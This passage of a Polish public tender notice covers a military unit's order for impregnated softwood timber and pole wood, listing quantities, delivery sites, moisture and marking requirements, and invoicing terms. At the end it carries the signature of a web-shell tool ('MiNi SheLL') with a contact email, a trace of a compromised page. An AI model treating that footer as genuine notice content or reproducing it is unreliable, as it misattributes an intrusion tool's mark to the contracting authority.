e)Wykonawca może wystawić fakturę VAT dopiero po dostarczeniu w całości danej pozycji asortymentowej do magazynu, zgodnie ze złożoną ofertą. Zamawiający nie dopuszcza faktur cząstkowych na dany asortyment materiału - wyrobu.
f)WYKAZ ODBIORCÓW adresatów:
Sekcja Obsługi Infrastruktury w Węgorzewie 
11-600 Węgorzewo, ul. Gen. Józefa Bema 16
Sekcja Obsługi Infrastruktury w Gołdapi 
19-500 Gołdap, ul. Wolności 8
Sekcja Zabezpieczenia Szkolenia
12-250 Orzysz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.19.14.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa tarcicy iglastej klasa II i drewna żerdziowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa tarcicy iglastej sosnowej desek, bali 
i drewna sosnowego żerdziowego według sortymentu, klasy i ilości podanych 
w tabeli poniżej. 
lp.Nazwa materiału - wyrobu
 wymagane dokumenty przy dostawie  okres przydatności do użycia jm.	Ilość
1 Tarcica 25 mm obrzynana iglasta kl. II dł. 4-6 mb, impregnowane
- dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo  - 2 m3    	
Sekcji Obsługi Infrastruktury Giżycko  - 10 m3    
Sekcji Obsługi Infrastruktury Gołdap  - 2 m3    
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 14
2.Tarcica 50 mm obrzynana iglasta kl. II dł. 4-6 mb, impregnowane
- dostawa do magazynu:
Sekcji Sprzętu infrastruktury Suwałki  - 1,76 m3
Sekcji Sprzętu infrastruktury Węgorzewo - 2 m3
Sekcji Sprzętu infrastruktury Giżycko  - 30 m3    
Sekcji Sprzętu infrastruktury Gołdap  - 2 m3    
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 35,76
3.Krawędziak  140x140 mm  iglasty kl. I dł.6 mb, impregnowany
- 2 sztuki  minimalna długość  6 mb
- dostawa do magazynu:
Sekcji Sprzętu infrastruktury Suwałki  - 0,24 m3 
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 
m3 0,24
4.Tarcica nieobrzynana 30 x 150mm, nie krótsza niż 3,5 mb lub wielokrotność
- dostawa do magazynu:
Sekcji Zabezpieczenia Szkolenia - 50 m3 
m3 50
5.Drewno sosnowe żerdziowe  fi 6 do 10cm, dł. 9 mb
- dostawa do magazynu:
Sekcji Zabezpieczenia Szkolenia - 5 m3
m3	5
6.Drewno sosnowe żerdziowe  fi 6 do 10cm, dł. 3 mb
- dostawa do magazynu:
Sekcji Zabezpieczenia Szkolenia - 25 m3	
m3 25
7.Tarcica 32 mm obrzynana iglasta kl. II 4,5 x 0,2 m, impregnowane
- dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo - 1 m3
Sekcji Obsługi Infrastruktury Giżycko  - 10 m3  
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 11
8.Tarcica 76 mm obrzynana iglasta kl. II6 x 0,2 m, impregnowane
 dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo  - 2 m3
Sekcji Obsługi Infrastruktury Giżycko  - 15 m3    
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 17
9.Tarcica 19 mm obrzynana iglasta kl. II dł. 4-6 mb, impregnowane
- dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo - 2 m 3 
 przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3  2
10.Tarcica  95 mm obrzynana iglasta kl. II dł.3 mb, impregnowane
- dostawa do magazynu:
Sekcji Obsługi Infrastruktury Węgorzewo- 1 m3
przy dostawie: oświadczenie o przeprowadzonej impregnacji metodą ciśnieniową oraz karta charakterystyki preparatu użytego do impregnacji 	
m3 1
Wykonawca w arkuszu ofertowym ma podać jaka substancja chemiczna preparat zostanie zastosowana do impregnacji tarcicy poz. Nr 1, 2, 3, 6, 7, 8, 9. Preparat do impregnacji drewna musi posiadać atest higieniczny. Dokument stwierdzający, że została przeprowadzona impregnacja wraz z kartą charakterystyki preparatu chemicznego użytego do impregnacji Wykonawca ma dostarczyć do wszystkich SOI.
4.2 UWAGI DOTYCZĄCE ZAMÓWIENIA :
a Podane wymiary nominalne desek i bali odnoszą się do drewna o wilgotności 20% w stosunku do masy drewna zupełnie suchego. W przypadku innej wilgotności drewna należy uwzględnić nadmiary dla I grupy na zeschnięcie wg normy PN-57/D-03003.
b Wykonawca powinien przy wycenie przyjąć koszt tarcicy wraz z opakowaniem, koszt dostawy do magazynów poszczególnych SOI oraz koszt rozładunku we wskazanym przez Odbiorcę miejscu.
c Dostawę należy realizować całościowo w danej pozycji asortymentowej. Materiały można dostarczyć na paletach przystosowanych do rozładunku wózkiem widłowym o udźwigu max. 1,2 tony. Palety, na których dostarczony zostanie towar w tym palety EURO i fabryczne nie podlegają zwrotowi. Należy ich koszt wliczyć w cenę towaru.
4.3	UWAGI DOTYCZĄCE DOSTAWY :
a Na czole lub w przypadku braku miejsca, na jednej z płaszczyzn tuż przy czole tarcicy powinny być umieszczone na każdej sztuce w sposób trwały następujące znaki: 
- 1 zielony punkt - znak klasy jakości, 
 - 1 żółty punkt - znak zabezpieczenia środkami antyseptycznymi   przed sinizną.
b Wilgotność tarcicy desek i bali w pakietach nie większa niż 25, luzem nie większa niż 22 .
c Wykonawca może wystawić fakturę po dostarczeniu zamówionego asortymentu tarcicy do danego SOI i Sekcji Zabezpieczenia Szkolenia zgodnie ze złożoną ofertą. Wraz z dostawą tarcicy Wykonawca pozostawi pod wskazanym adresem kopię faktury, zaś oryginał faktury wraz z dokumentem typu WZ, na którym Kierownik SOI lub osoba przez niego upoważniona potwierdziła przyjęcie towaru pod względem ilościowym i jakościowym, dostarczy do kancelarii JW. 4352, adres: 11-500 Giżycko, ul. Nowowiejska 21. 
d Wykonawca przed dostawą tarcicy do magazynów musi uzgodnić termin 
i wielkość dostawy na minimum 48 godz. przed zaplanowaną dostawą. 
WYKAZ ODBIORCÓW adresatów
Sekcja Obsługi Infrastruktury w Węgorzewie 
11-600 Węgorzewo, ul. Gen. Józefa Bema 16
Sekcja Obsługi Infrastruktury w Gołdapi 
19-500 Gołdap, ul. Wolności 8
Sekcja Obsługi Infrastruktury w Suwałkach 
16-400 Suwałki, ul. Wojska Polskiego 21
Sekcja Obsługi Infrastruktury w Giżycku 
11-501 Giżycko, ul. Moniuszki 
Sekcja Zabezpieczenia Szkolenia
12-250 Orzysz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.41.10.00-4, 03.41.90.00-0, 03.41.40.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com